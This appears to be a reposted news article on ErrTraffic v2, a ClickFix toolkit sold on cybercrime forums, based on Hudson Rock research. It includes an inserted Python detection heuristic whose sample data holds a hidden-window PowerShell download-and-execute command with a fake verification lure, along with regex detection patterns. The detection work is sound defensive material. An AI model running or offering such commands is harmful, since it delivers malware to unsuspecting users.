
The toolkit, known as ErrTraffic v2, industrializes the “ClickFix” scam: deceptive overlays that manipulate victims into manually executing malicious scripts.
Promoted on Russian-language cybercrime forums by a threat actor using the alias “LenAI”, ErrTraffic is being sold for about $800, dramatically lowering the technical barrier for entry-level hackers to launch professional-grade attacks.
From Drive-By Downloads to ClickFix Campaigns
Researchers at Hudson Rock report that the emergence of ErrTraffic reflects a significant shift in attack strategy.
As browser security has made drive-by downloads nearly obsolete, cybercriminals have turned to “Social Engineering 2.0,” focusing on psychological exploitation rather than software vulnerabilities.
The ClickFix model presents victims with fake system errors or corrupted text elements, visual “glitches” that appear to break a website. To fix the issue, users are instructed to copy a “verification code” into Windows Run or PowerShell, unknowingly executing malware.

This approach effectively defeats most modern defense systems. From the browser’s point of view, the user copies legitimate text.
From the endpoint detection system’s perspective, the PowerShell command appears to have been initiated by the user, not by an external file. Once executed, however, the script downloads and runs a stealth payload with full privileges, bypassing traditional scanning or sandboxing.
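A detection heuristic for the pattern described above, as an added example that is not from Hudson Rock or the original article: it scans process-creation events (field names follow Sysmon Event ID 1) for a script host started by explorer.exe whose command line shows download-and-run traits. The indicator list, the threshold, and the sample events are constructed assumptions.

```python
import re

# Script hosts a ClickFix lure asks the victim to start from Win+R or a terminal.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A parent of explorer.exe means a person launched it (Run dialog, Start menu).
INTERACTIVE_PARENTS = {"explorer.exe"}
# Heuristic command-line traits (assumptions for this example, tune per estate).
INDICATORS = {
    "remote_fetch": re.compile(r"https?://", re.I),
    "download_exec": re.compile(
        r"\b(iex|invoke-expression|irm|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_cmd": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "lure_text": re.compile(r"captcha|verif|not a robot", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return matched indicator names; [] when the process pair is out of scope."""
    if basename(ev["Image"]) not in SCRIPT_HOSTS:
        return []
    if basename(ev["ParentImage"]) not in INTERACTIVE_PARENTS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(ev["CommandLine"])]

def triage(events, threshold=2):
    """Keep events with at least `threshold` indicators, to spare plain shell use."""
    return [(ev["CommandLine"], hits) for ev in events
            if len(hits := score_event(ev)) >= threshold]

# Constructed sample events; example.invalid is a placeholder host.
SAMPLE = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/v)"'
                    " # I am not a robot - Verification ID 1234"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc " + "QQBCAEMA" * 4},
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE):
        print(hits, "->", cmd)
```

A command pasted into an already-open terminal has that terminal as its parent, so the parent filter here covers only the Windows Run path.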
The Industrial Design of ErrTraffic
Hudson Rock’s investigation revealed that the tool includes a refined web dashboard resembling legitimate marketing software.
Panels show campaign statistics such as page views, downloads, and infection rates, some reaching nearly 60 percent, an extraordinarily high success rate for social engineering campaigns.
ErrTraffic functions as a Traffic Distribution System (TDS) that delivers different payloads depending on the victim’s operating system.
It can target Windows, macOS, Android, and Linux platforms by serving customized files through a single injected HTML line. The system relies on a .js.php script that executes server-side logic and delivers dynamic JavaScript to browsers, ensuring stealth and persistence.
One of the tool’s major selling points is that it “does not affect site files.” The malicious overlay only triggers under certain conditions, allowing legitimate websites to continue functioning normally.
It also excludes Commonwealth of Independent States (CIS) regions from targeting, consistent with Russian-speaking cybercrime communities that aim to evade local law enforcement.
Hudson Rock warns that ErrTraffic could feed a self-sustaining infection cycle, as stolen website credentials are reused to deploy the same scripts elsewhere.
The campaign illustrates how modern cybercrime has evolved, with social engineering, not software exploits, becoming the most powerful vector of compromise.
The post ErrTraffic Emerges as a New Tool for Automating ClickFix Cyberattacks appeared first on Cyber Security News.
